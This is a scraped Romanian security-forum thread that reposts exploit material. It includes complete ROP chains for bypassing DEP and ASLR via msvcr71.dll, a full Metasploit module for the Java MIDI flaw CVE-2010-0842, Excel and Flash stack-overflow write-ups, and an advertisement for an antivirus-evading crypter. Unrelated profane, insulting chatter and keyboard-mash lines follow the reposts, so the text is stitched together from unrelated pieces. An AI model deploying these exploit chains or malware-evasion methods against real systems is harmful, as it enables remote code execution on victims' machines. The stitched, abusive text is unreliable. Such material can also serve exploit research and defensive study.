Nytro

[h=2]Universal DEP/ASLR bypass with msvcr71.dll and mona.py[/h] Published July 3, 2011 | By Corelan Team (corelanc0d3r) [h=2]Introduction[/h] Over the last few weeks, there has been some commotion about a universal DEP/ASLR bypass routine using ROP gadgets from msvcr71.dll and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty. For the record, I don’t know exactly what happened nor have I seen the proof… so I’m not going to make any statements about this or judge anyone. Furthermore, this post is not about the incident, but about the routine itself (which looks pretty slick) and alternative routines. [h=2]The White Phosphorus version[/h] Released as part of the White Phosphorus Exploit Pack, the routine only uses gadgets and pointer to VirtualProtect from msvcr71.dll. That particular version of the dll does not rebase and is not ASLR enabled either, which makes it a perfect candidate for universal/generic DEP & ASLR bypass, providing that it contains all required gadgets to perform a generic ROP routine. If your target application has that particular version of the dll loaded (or if you can force it to load one way or another), you can use the ROP chain to bypass DEP and ASLR in a generic way. Immunity Inc published the bypass technique on their website. The routine looks like this : def wp_sayonaraASLRDEPBypass(size=1000): # White Phosphorus # Sayonara Universal ASLR + DEP bypass for Windows [2003/XP/Vista/7] # # This technique uses msvcr71.dll which has shipped unchanged # in the Java Runtime Environment since v1.6.0.0 released # December 2006. # # mail: support@whitephosphorus org # sales: http://www.immunityinc.com/products-whitephosphorus.shtml print "WP> Building Sayonara - Universal ASLR and DEP bypass" size += 4 # bytes to shellcode after pushad esp ptr depBypass = pack('<L', 0x7C344CC1) # pop eax;ret; depBypass += pack('<L', 0x7C3410C2) # pop ecx;pop ecx;ret; depBypass += pack('<L', 0x7C342462) # xor chain; call eax {0x7C3410C2} depBypass += pack('<L', 0x7C38C510) # writeable location for lpflOldProtect depBypass += pack('<L', 0x7C365645) # pop esi;ret; depBypass += pack('<L', 0x7C345243) # ret; depBypass += pack('<L', 0x7C348F46) # pop ebp;ret; depBypass += pack('<L', 0x7C3487EC) # call eax depBypass += pack('<L', 0x7C344CC1) # pop eax;ret; depBypass += pack("<i", -size) # {size} depBypass += pack('<L', 0x7C34D749) # neg eax;ret; {adjust size} depBypass += pack('<L', 0x7C3458AA) # add ebx, eax;ret; {size into ebx} depBypass += pack('<L', 0x7C3439FA) # pop edx;ret; depBypass += pack('<L', 0xFFFFFFC0) # {flag} depBypass += pack('<L', 0x7C351EB1) # neg edx;ret; {adjust flag} depBypass += pack('<L', 0x7C354648) # pop edi;ret; depBypass += pack('<L', 0x7C3530EA) # mov eax,[eax];ret; depBypass += pack('<L', 0x7C344CC1) # pop eax;ret; depBypass += pack('<L', 0x7C37A181) # (VP RVA + 30) - {0xEF adjustment} depBypass += pack('<L', 0x7C355AEB) # sub eax,30;ret; depBypass += pack('<L', 0x7C378C81) # pushad; add al,0xef; ret; depBypass += pack('<L', 0x7C36683F) # push esp;ret; print "WP> Universal Bypass Size: %d bytes"%len(depBypass) return depBypass (22 dwords) Triggered by the Metasploit bounty "incident", the fact that Abysssec published a post/document just a few hours ago, and because Immunity already released the routine, I decided to take a look myself & see if there would be another way to build an alternative DEP/ASLR Bypass routine from msvcr71.dll. [h=2]The alternative version (mona.py)[/h] I attached Immunity Debugger to an application that has the dll loaded, and used mona.py to create a database with rop gadgets & have it produce a rop chain. Since the one written part of White Phosporus doesn’t have any null bytes, I will try to do the same thing. This is the result : Command used : 17 seconds later, I got this : rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (msvcr71.dll) 0x7c37a140, # <- *&VirtualProtect() 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (msvcr71.dll) 0x????????, # ** <- find routine to move virtualprotect() into esi # ** Hint : look for mov [esp+offset],eax and pop esi 0x7c376402, # POP EBP # RETN (msvcr71.dll) 0x7c345c30, # ptr to 'push esp # ret ' (from msvcr71.dll) 0x7c346c0a, # POP EAX # RETN (msvcr71.dll) 0xfffffdff, # value to negate, target value : 0x00000201, target: ebx 0x7c351e05, # NEG EAX # RETN (msvcr71.dll) 0x7c354901, # POP EBX # RETN (msvcr71.dll) 0xffffffff, # pop value into ebx 0x7c345255, # INC EBX # FPATAN # RETN (msvcr71.dll) 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (msvcr71.dll) 0x7c34d201, # POP ECX # RETN (msvcr71.dll) 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) 0x7c34b8d7, # POP EDI # RETN (msvcr71.dll) 0x7c34b8d8, # ROP NOP (-> edi) 0x7c344f87, # POP EDX # RETN (msvcr71.dll) 0xffffffc0, # value to negate, target value : 0x00000040, target: edx 0x7c351eb1, # NEG EDX # RETN (msvcr71.dll) 0x7c346c0a, # POP EAX # RETN (msvcr71.dll) 0x90909090, # NOPS (-> eax) 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (msvcr71.dll) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix some gadgets, # but it should give you a head start ].pack("V*") Interesting… mona.py generated an almost complete ROP chain using gadgets using pointers from msvcr71.dll. It is slightly larger than the one written by Immunity (so yes, the one part of WP is most likely better), but I just wanted to see if there was an alternative available. The only thing that is missing from the one mona generated, is a routine that would put the VirtualProtect() (in eax) into esi. mona.py didn’t find any obvious gadgets that would simply do something such as "mov esi,eax", so I had to manually search for an alternative. But as mona.py suggested, I simply had to find a gadget that would write the value in eax onto the stack, so you can pick it up in esi later on. In order to do so, you probably need 2 or 3 gadgets : one to get the stack pointer, a second one to write the value onto the stack and a third one to pick it up (pop esi). After searching the generated rop.txt file for a few minutes, I found the following 2 gadgets that will do this : 0x7c37591f : # PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN That should work. Using those 2 gadgets, we can simply write the pointer to VirtualProtect() onto the stack and pick it up in ESI. In fact, the second gadget will write and pick up in the same gadget. We just need to make ECX point at the correct location on the stack and make sure POP ESI will take it from that location. Note that the first gadget requires EAX to contain a valid pointer to a readable location. So all we would have to do to make it readable is pop a readable address from msvcr71.dll into EAX first. Putting all of this together, the chain looks like this : rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # Make EAX readable 0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) 0x41414141, # EBP (filler) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # <- *&VirtualProtect() 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) 0x7c346c0b, # Slide, so next gadget would write to correct stack location 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) 0x41414141, # EDI (filler) 0x41414141, # will be patched at runtime (VP), then picked up into ESI 0x41414141, # EBX (filler) 0x7c376402, # POP EBP # RETN (msvcr71.dll) 0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0xfffffdff, # size 0x00000201 -> ebx, modify if needed 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll) 0x7c354901, # POP EBX # RETN (MSVCR71.dll) 0xffffffff, # pop value into ebx 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll) 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) 0x7c34d201, # POP ECX # RETN (MSVCR71.dll) 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll) 0x7c34b8d8, # ROP NOP (-> edi) 0x7c344f87, # POP EDX # RETN (MSVCR71.dll) 0xffffffc0, # value to negate, target value : 0x00000040, target: edx 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x90909090, # NOPS (-> eax) 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) # rop chain generated with mona.py ].pack("V*") 31 dwords… 9 dwords larger than the commercial one from White Phosphorus… but it proves my point. It took me less than 10 minutes to build this chain, it’s universal and bypasses DEP and ASLR. Oh, by the way, in case you didn’t know… if you have other bad chars (so let’s say you also need to avoid using ‘\x0a’ and ‘\x0d’) then you could just run and get other pointers… yes, it’s that simple. !mona rop -m msvcr71.dll -n -cpb '\x0a\x0d' [h=2]Conclusion[/h] no matter how nice & ‘tempting’ a certain solution looks like, there always might be an alternative, and creativity often leads to results. © 2011, Corelan Team (corelanc0d3r). All rights reserved. Vedeti la sursa, futui grijania masii de vbulletin, nu dati bai pe cacatul asta. Sursa: https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/

Wi-Fi Security with Wi-Fi Protection Plus Ajin Abraham, Joseph Sebastian Vimal Jyothi Engineering College. ajin25 @ gmail.com +91-9633325997 josephs_18 @ live.com +91-9495587202 Abstract Current Industrial standards of Wi-Fi security are found to have security loop holes, making it possible for hackers to break it. So we consider the possibility of a new technology for Wi-Fi security. We call it Wi-Fi P+ or Wireless Fidelity Protection Plus Introduction Wi-Fi is common nowadays. Every educational institutions and business organizations has got their perimeter covered in Wi-Fi. All the confidential data being transmitted through Wi-Fi, makes it a target for Hackers. To secure it, some Wi-Fi security standards like WEP, WPA, and WPA2 are introduced. Each of them is introduced when the previous security architecture was found to be a failure. But in present situation all of these industrial standard Wi Fi security architectures are found to have vulnerabilities so that a hacker can hack into the Wi Fi network. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18486.pdf

[h=1]Java MixerSequencer Object GM_Song Structure Handling Vulnerability[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Java MixerSequencer Object GM_Song Structure Handling Vulnerability", 'Description' => %q{ This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability "ebx" points to a fake event in the MIDI file which stores the shellcode. A "jmp ebx" from msvcr71.dll is used to make the exploit reliable over java updates. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peter Vreugdenhil', # Vulnerability Discovery and exploit 'juan vazquez', # Metasploit module ], 'References' => [ [ 'CVE', '2010-0842' ], [ 'OSVDB', '63493'], [ 'BID', '39077'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-060/' ], [ 'URL', 'http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/'] ], 'Payload' => { 'Space' => 8000, }, 'DefaultOptions' => { 'EXITFUNC' => "process", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ # Tested succesfully on: # Windows XP SP3 / IE 6 / Java 6u18 # Windows XP SP3 / IE 7 / Java 6u18 # Windows XP SP3 / IE 8 / Java 6u18 # Windows XP SP3 / Firefox 7.0.1 / Java 6u18 # Windows XP SP3 / IE 8 / Java 6u17 # Windows XP SP3 / Firefox 7.0.1 / Java 6u17 # Windows 7 / IE 8 / Java 6u18 'Windows / Java 6 <=u18', { 'Ret' => 0x7C35A78D # jmp ebx # msvcr71.dll } ], ], 'Privileged' => false, 'DisclosureDate' => "Mar 30 2010", 'DefaultTarget' => 0)) end def get_rmf rmf_header = "" rmf_header << "IREZ" # RMFHeaderMagic rmf_header << "\x00\x00\x00\x01" # RMFVersionNumber rmf_header << "\x00\x00\x00\x02" # NumberOfRMFBlocks song_block = "" song_block << "\x00\x00\x00\x65" # OffsetToNextBlock song_block << "SONG" # BlockType song_block << [target.ret].pack("N") # BlockID song_block << "\x00" # BlockName song_block << "\x00\x00\x00\x47" # BlockDataSize song_block << "\x7F\xFF\x00\x01\x00\x00\x01\x01" # BlockData song_block << "\x00\x00\x00\x04\x00\x1C\x00\x08" # BlockData song_block << "\x00\x7F\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x01\x54\x49\x54\x4C\x9F\xB1" # BlockData song_block << "\xB5\x0D\x0A\x7E\xFB\x70\x9C\x86" # BlockData song_block << "\xFE\xB0\x35\x93\xE2\x5E\xDE\xF7" # BlockData midi = "" # HEADERCHUNK Header midi << "MThd" # Header midi << "\x00\x00\x00\x06" # Chunk size midi << "\x00\x01" # Format Type midi << "\x00\x01" # Number of tracks midi << "\x00\x08" # Time division # TRACKCHUNK header midi << "MTrk" # Header midi << "\x00\x00\x24\xd7" # Length midi << "\x00\xb0\x80\x00" # Controller Event # Triggers the vulnerability # Fake Midi Meta event - Shellcode midi << "\x38" # Variable lenght delta time midi << "\xff" # Midi meta event midi << "\x02" # Meta event type 02 => Copyright notice midi << "\xc9\x50" # Variable Meta Event Length midi << payload.encoded midi << rand_text(9123 - payload.encoded.length) midi_block = "\x00\x00\x25\x60" # OffsetToNextBlock midi_block << "Midi" # BlockType midi_block << "\x00\x00\x7f\xff" # BlockID midi_block << "\x00" # BlockName midi_block << "\x00\x00\x24\xed" # BlockDataSize midi_block << midi # BlockData rmf = "" rmf << rmf_header rmf << song_block rmf << midi_block rmf_name = "#{rand_text_alpha(rand(5) + 3)}.rmf" return rmf_name, rmf end def get_jar files = [ [ "MyController.class" ], [ "MixerMidiApplet.class" ], [ "META-INF", "services", "javax.sound.midi.spi.MidiDeviceProvider" ] ] jar = Rex::Zip::Jar.new jar.add_file("META-INF/", "") jar.add_file("META-INF/services/", "") jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0842")) jar.build_manifest jar_name = "#{rand_text_alpha(rand(5) + 3)}.jar" return jar_name, jar end def on_request_uri(cli, request) if request.uri =~ /\.jar$/i print_status("Sending JAR file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, @jar.pack, {'Content-Type'=>'application/octet-strem'}) return end if request.uri =~ /\.rmf$/i print_status("Sending RMF file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, @rmf, {'Content-Type'=>'application/octet-strem'}) return end base_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource rmf_uri = base_uri + "/#{@rmf_name}" jar_uri = base_uri + "/#{@jar_name}" html = %Q| <html> <head> </head> <body> <applet code="MixerMidiApplet.class" archive="#{jar_uri}" width=350 height=200> <param name="midifile" valuetype="ref" value="#{rmf_uri}"> </applet> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @jar_name, @jar = get_jar @rmf_name, @rmf = get_rmf super end end Sursa: Java MixerSequencer Object GM_Song Structure Handling Vulnerability

[h=2]Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021)[/h]Posted by shahin in Exploits / BUG Decryption hello all as we didn’t publish any exploit for a bit we just going to release. [h=2]1) Advisory information[/h] Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability Vendor : Microsoft Corporation: Software, Smartphones, Online, Games, Cloud Computing, IT Business Technology, Downloads Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec Microsoft : A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files.An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. [h=2]2) Vulnerability detail[/h] each excel file can contain multiple BOF (2057) records . This record specifies the first substream associated with workbook.One of the fields in these records, specify substream recordd to come with. This field can be extracted from sub_3018F0C2 function. .text:301A0C87 push [ebp+arg_2C] .text:301A0C8A mov ecx, [ebp+var_14] .text:301A0C8D push 1 .text:301A0C8F call sub_3018F0C2 .text:301A0C94 mov ecx, eax .text:301A0C96 mov eax, [ebp+arg_24] .text:301A0C99 cmp eax, ebx .text:301A0C9B mov [ebp+var_10], ecx .text:301A0C9E jz short loc_301A0CA2 .text:301A0CA0 mov [eax], ecx If the field value is equal with 400, sub_3019DFBA function is called to check file type. if file type is xls EXCEL.exe will display a message If approved it will continue to run the code.if you change file extension to xlb there will be any message. After this step sub_3053F626 function will be executed. This function will parse the next BOF records. .text:304D4E9D cmp [ebp+arg_20], ebx .text:304D4EA0 jnz short loc_304D4EC6 .text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h .text:304D4EAC jnz short loc_304D4EC6 .text:304D4EAE mov edx, [ebp+arg_C] .text:304D4EB1 mov ecx, [ebp+arg_8] .text:304D4EB4 push 3Fh .text:304D4EB6 call sub_3019DFBA .text:304D4EBB cmp eax, ebx .text:304D4EBD mov [ebp+var_8], eax .text:304D4EC0 jz loc_304D4FD3 .text:304D4EC6 .text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j .text:304D4EC6 ; sub_301A0BC7+3342E5j .text:304D4EC6 push ebx .text:304D4EC7 push dword_30EB89A4 .text:304D4ECD push [ebp+var_C] .text:304D4ED0 call sub_3053F626 .text:304D4ED5 cmp dword_30F5E64C, ebx .text:304D4EDB mov [ebp+var_8], eax .text:304D4EDE jz short loc_304D4EE7 .text:304D4EE0 cmp eax, ebx .text:304D4EE2 jz short loc_304D4EE7 one of records may come after BOF,is undocumented record which have record type equal to 0xA7 (167). for truly parsing this record should come with another record with 0x3C (60) record type. if it meet this requirement the length of records will be read and copied to the stack the function which operation of copying data records in the stack is sub_30199E55. This function takes three arguments .The first argument specifies the number of bytes to copy, which will read from file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data can be copied. values of the second and third arguments based on the amount of computing reading from file and into this cumpoting,computational error which may occur here … .text:3053F830 call sub_301A0A01 .text:3053F835 cmp eax, 3Ch .text:3053F838 mov [ebp+var_ED4], eax .text:3053F83E jnz loc_30540488 .text:3053F844 call sub_301A0A01 .text:3053F849 mov ecx, [ebp+var_EDC] .text:3053F84F imul ecx, [ebp+var_F00] .text:3053F856 mov edi, eax .text:3053F858 mov eax, [ebp+var_EE0] .text:3053F85E lea ebx, [ecx+eax+3] .text:3053F862 call sub_301A0ABE .text:3053F867 push 0FFFFFFFDh .text:3053F869 pop edx .text:3053F86A sub edx, ecx .text:3053F86C add eax, edx .text:3053F86E push eax ; Dst .text:3053F86F push ebx ; int .text:3053F870 mov eax, edi .text:3053F872 call sub_30199E55 the vulnerability that exists here is that we can change the value of parameter 3 whith our own values. program will not correcly controll third argument of sub_30199E55 this and can result in the desired amount and location of desired data can overwrite in the stack. .text:30199E60 cmp edi, [esp+4+Dst] .text:30199E64 ja loc_303EE1B7 .text:30199E6A mov ecx, [esp+4+arg_0] .text:30199E6E push ebx .text:30199E6F mov ebx, dword_30F726C0 .text:30199E75 push ebp .text:30199E76 mov ebp, nNumberOfBytesToRead .text:30199E7C push esi .text:30199E7D mov [esp+10h+Dst], ecx .... .text:30199E93 mov eax, [esp+10h+Dst] .text:30199E97 push esi ; Size .text:30199E98 lea edx, dword_30F6E6B8[ebx] .text:30199E9E push edx ; Src .text:30199E9F push eax ; Dst .text:30199EA0 sub edi, esi .text:30199EA2 call memcpy .text:30199EA7 add [esp+1Ch+Dst], esi .text:30199EAB add ebx, esi .text:30199EAD add esp, 0Ch .text:30199EB0 test edi, edi .text:30199EB2 mov dword_30F726C0, ebx .text:30199EB8 jnz loc_301E0DB3 [h=2]3) Exploitation :[/h] Stack overflows are not hard to exploit at all ! but as we have both /GS , SAFESEH here. because given that we are destined to memcpy we can change it so that it begins to overwrite the stack after GS. and from there when the return comes , our values contained in the ESP and we can call it with simple call esp and game is over !!! [h=6]download full exploit source : MS11-021[/h] Happy Hacking . Sursa: Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021) | Abysssec Security Research

[h=2]bypassing all anti-virus in the world (Good Bye Detection , Hello Infection)[/h]Posted by shahin in news, Pen-test Method, reversing hello to all readers [h=2]Introduction[/h] as you may read in @abysssec in twitter actually in past a few months we did a cool research on bypassing anti-viruses and got really great result . Bypassing anti-viruses is not a new topic and it’s still about encrypting / decrypting of a program to being hide from AV eyes. In past it was really, really easy task to do but AV’s getting smarter and bypassing all anti-viruses with some really unique methods that each of them use is not funny and neither easy to do. before i go feature i like to have a simple glossary for unfamiliar readers. [h=2]Glossary[/h] Crypter : the program (mostly GUI) will crypt the malware / bot to make it hide from anti-viruses Stub : the Decryptor of crypted program FUD : Fully Un Detectable (FUD = no AV detect) RUNPE : run the PE without headers in memory USG : unique stub generator. (make unique stubs) Binder: will join two file will drop in hdd or mem Pumper: will increase size of tool EOF : end of file(in crypter it need to preserve) Cloner : will clone the file (Decryptor like in HDD) Icon Changer: will change the final exe icon well there are two also different kind of crypters scan time and run time. The good crypter is run time one because as it name says the scan time crypter is just FUD at scan time and when you run it and after real malware decrypted it will be detect so not that useful. And the real crypter is the runtime one. [h=2]How it works ?[/h] if we remove all complex technical info for bypassing all 35 anti-virus around the world it works really sample. it simply encrypt program, decrypt, and then run it in memory. encryption algorithm is not important and sample ideas are enough to make a crypter fud but some of mostly used alghortims are : I. RC4 II. AES III.DES IV. TEA V. XOR VI. CryptoAPI VII. blowfish note that there is important part in your job and that is run the malware safely in memory after decrypting it , and this is done by RunPE . the idea of RunPE comes from great PoC by Tan Chew Keong called dynamic forking of win32 exe : SIG^2 G-TEC - Dynamic Forking of Win32 EXE steps and idea are really sample : CreateProcess Find Base address Virtualalloc Align sections Fix thread context Resume thread but this is not easy to hide this kind of API chaining from anti-viruses . so we finished our research by writing a new fud crypter and our crypter is unique and different with public ones . our crypter is unique and can bypass all 35 exist av right now . here is list of AV we fully tested our crypters on them . - Ad-Aware - AhnLab V3 Internet Security - ArcaVir - Avast - Avast 5 - AVG Free - AntiVir (Avira) - BitDefender - BullGuard - VirusBuster Internet Security - Clam Antivirus - COMODO Internet Security - Dr.Web - eTrust-Vet - F-PROT Antivirus - F-Secure Internet Security - G Data - IKARUS Security - Kaspersky Antivirus - McAfee - MS Security Essentials - ESET NOD32 - Norman - Norton Antivirus - Panda Security - A-Squared - Quick Heal Antivirus - Rising Antivirus - Solo Antivirus - Sophos - Trend Micro Internet Security - VBA32 Antivirus - Vexira Antivirus - Webroot Internet Security - Zoner AntiVirus we even tested 10 year ago malware and our crypter can hide them from any anti-virus system . our crypter comes with some unique features here is some of them - FUD 0 / 35 detection - EOF support - Coded in C/ASM Stub and GUI In C# - Compatible with Win 2k/XP/7 x32 and x64 - Ability of bypassing heuristic and emulators (Kaspersky pro-acvtive defense , Nod32 advanced heuristic , Norton Sonar, Avira heuristic) - Command line support - Unicode support (chines , russian and so on) - Right-to-Left Exploit after crypting you can have .mp3 , doc , pdf , avi or anything as output !!! - inbuilt scanner and scanning with 35 anti-virus after cryptring - advanced file binder with drop in disk and memory - Anti-debug - Anti-sandbox - advanced encryption : Double XOR , RC4, AES256 - Advanced resource storage : unique method here is some screen shot of GUI : and finally you can see the actual work in a demo here : http://abysssec.com/files/VampCrypt.rar as we don’t want harm anyone if you are : - penetration testing company - anti virus / IDS company - any legit company who needs it ” please note that WE DON”T give tool / technology to PERSON . ONLY VERIFIED COMPANY ” contact : info [at] abysssec.com and as always you can follow @abysssec in twitter happy fudding . Sursa: bypassing all anti-virus in the world (Good Bye Detection , Hello Infection) | Abysssec Security Research

[h=2]Exploiting CVE-2011-2140 another flash player vulnerability[/h]Posted by shahin hello all . before going future we are sorry to not update blog regularly, but it’s due to we are busy with stack of projects and also working on our expert training courses. so as we didn’t post any blog post here we go with another flash player exploit we wrote long time ago. [h=1]1) Advisory information[/h] [TABLE] [TR] [TD=width: 638] Title : Adobe flash player memory overwrite exploit Version : <= 10.3.186.3 Discovery : Zero Day Initiative Vendor : http://adobe.com Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec [/TD] [/TR] [/TABLE] [h=1]2) Vulnerability Information[/h] [TABLE] [TR] [TD=width: 638]Class 1- Stack OverwriteImpactSuccessfully exploiting this issue allows remote attackers to gain code execution on vulnerable system Remotely Exploitable Yes Locally Exploitable Yes [/TD] [/TR] [/TABLE] [h=1]3) Vulnerabilities detail[/h] [h=2]1- Stack overwrite vulnerability[/h] Before we go deep into the vulnerability for understanding this vulnerability you should take a look at MP4 format and H.264/AVC data structures.The actual vulnerability occurs during processing data units in Sequence Parameter Set in MP4. Sub_1005B396 function, is responsible for processing Sequence Parameter Set. In this function pic_order_cnt_type from SPS will be check, if it’s equal with 1, other fields like data_pic_order_always_zero_flag , offset_for_non_ref_pic , offset_for_top_to_bottom_field will be initialize : [TABLE] [TR] [TD=width: 638].text:1005B396 sub_1005B396 proc near ; CODE XREF: sub_1005B8DB+4Bp.text:1005B397 push ebp.text:1005B398 push esi.text:1005B399 push edi .text:1005B39A mov edi, ecx .text:1005B39C call sub_1005A95B .text:1005B3A1 mov esi, [esp+10h+arg_0] .text:1005B3A5 mov ecx, edi .text:1005B3A7 mov [esi], al … .text:1005B47D mov ecx, edi .text:1005B47F mov [esi+20h], eax .text:1005B482 call sub_1005AA64 .text:1005B487 mov [esi+40h], eax .text:1005B48A cmp eax, ebp à if( pic_order_cnt_type ) .text:1005B48C jnz short loc_1005B49D … .text:1005B49D loc_1005B49D: ; CODE XREF: sub_1005B396+F6j .text:1005B49D xor ebx, ebx .text:1005B49F inc ebx .text:1005B4A0 cmp eax, ebx à if( pic_order_cnt_type == 1 ) .text:1005B4A2 jnz short loc_1005B4EF .text:1005B4A4 mov ecx, edi .text:1005B4A6 call sub_1005A99A à offset_for_top_to_bottom_field .text:1005B4AB mov ecx, edi .text:1005B4AD mov [esi+48h], al .text:1005B4B0 call sub_1005AA93 à offset_for_non_ref_pic .text:1005B4B5 mov ecx, edi .text:1005B4B7 mov [esi+54h], eax .text:1005B4BA call sub_1005AA93 à offset_for_top_to_bottom_field [/TD] [/TR] [/TABLE] Then the num_ref_frames_in_pic_order_cnt_cycle will be set and if it’s bigger than 0 the values in offset_for_ref_frame will be copied into buffer. [TABLE] [TR] [TD=width: 638]text:1005B4BF mov ecx, edi.text:1005B4C1 mov [esi+50h], eax.text:1005B4C4 call sub_1005AA64 à num_ref_frames_in_pic_order_cnt_cycle.text:1005B4C9 mov [esi+4Ch], eax .text:1005B4CC test eax, eax .text:1005B4CE jbe short loc_1005B4EF .text:1005B4D0 lea eax, [esi+58h] .text:1005B4D3 mov [esp+10h+arg_0], eax .text:1005B4D7 .text:1005B4D7 loc_1005B4D7: à do{ .text:1005B4D7 mov ecx, edi .text:1005B4D9 call sub_1005AA93 à offset_for_ref_frame .text:1005B4DE mov ecx, [esp+10h+arg_0] .text:1005B4E2 add [esp+10h+arg_0], 4 à buf = &buf + 4 .text:1005B4E7 inc ebp à i++ .text:1005B4E8 mov [ecx], eax à buf = offset_for_ref_frame .text:1005B4EA cmp ebp, [esi+4Ch] .text:1005B4ED jb short loc_1005B4D7 à } while(i < num_ref_frames_…) [/TD] [/TR] [/TABLE] You should got the vulnerability at this point. There is no boundary check for num_ref_frames_in_pic_order_cnt_cycle, so our data related to offset_for_ref_frame will be copy into the stack , that’s all . [h=2]2- Exploitation[/h] Thanks to windows memory manager, browser and class of bug it’s not that hard to archive RCE. The only thing that should care about is return address. Because values which copied from MP4 file into stack, come with the changes. In other words, these values ??after reading from file will be decode and then are copied into stack. Values ??are copied into the buffer are generated from values in file into Signed Exp-Golomb code.After taking controll of EIP it’s easy to finish the job we used basic heap spray. here is reliable exploit : CVE-2011-2140 happy hunting ! Sursa: Exploiting CVE-2011-2140 another flash player vulnerability | Abysssec Security Research

dsfsdfdsfdsfdsf

ghjghj

Da, interesanta idee, poate fi foarte utila o astfel de utilitate.

Avem o categorie numita "Cos de gunoi" unde mutam toate porcariile. Tu ai postat niste link-uri de 2 lei, nu vad ce ar cauta asa ceva la Show-Off. Ai extras macar versiunea bazei de date? Intrati pe un link, puneti o ghilimea si sunteti 1337.Sau puneti acel link in Havij si sunteti 31337. O sa dau ban pentru astfel de porcarii.

Alcoolul dauneaza grav sanatatii. Lasati cacaturile si faceti ceva constructiv.

Trebuie sa facem "discriminari" apoi. Si pentru ce, pentru niste conturi? Trebuie sa luam in considerare cine si de ce ar avea acces la continut pus de alte persoane, si care persoane sa aiba permisiunea de a posta. Apoi, sincer, ce cacat faceti cu acele conturi? Cate persoane AR POSTA conturi?

Vad doar un link, deci nimic de Show-Off, deci se muta la gunoi.

Asta e "Show Off" ba? Ratatii din ziua de azi... In trecut prin "Show off" se intelegea un Full Disclosure, acum vad numai un cacat de link pe care il bagati in Havij si gata. Muie generatiei "tinere"!

Nu conteaza, e bine pentru inceput.

Ce dracu sa va cer, daca atat va duce capul sa va luati dupa niste copii copaci...

Foarte interesant. Ban. Mi s-a luat de posturi de cacat,

Poate e pentru ca baui, dar ma pis pe amandoi. Muie.

Sa ma fut pe anonimusii vostri ratatilor.

Copii fara viitor, au invatat sa foloseasca Google si au devenit hackeri, patetici.

Eu ii dadeam ban lui Tinkode aici, Tinkode imi dadea ban pe ISR. Ce vremuri

De la ieu pt baety: Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube

dsfMrdfUfxIcvE AdfNsdOdsfNtyYfgMzOxcUasSdf.

Sa nu va plangeti la mine ca a venit valu' de copii copaci peste voi...

L-am oprit pe Salam ca sa ascult porcaria aia? Muie!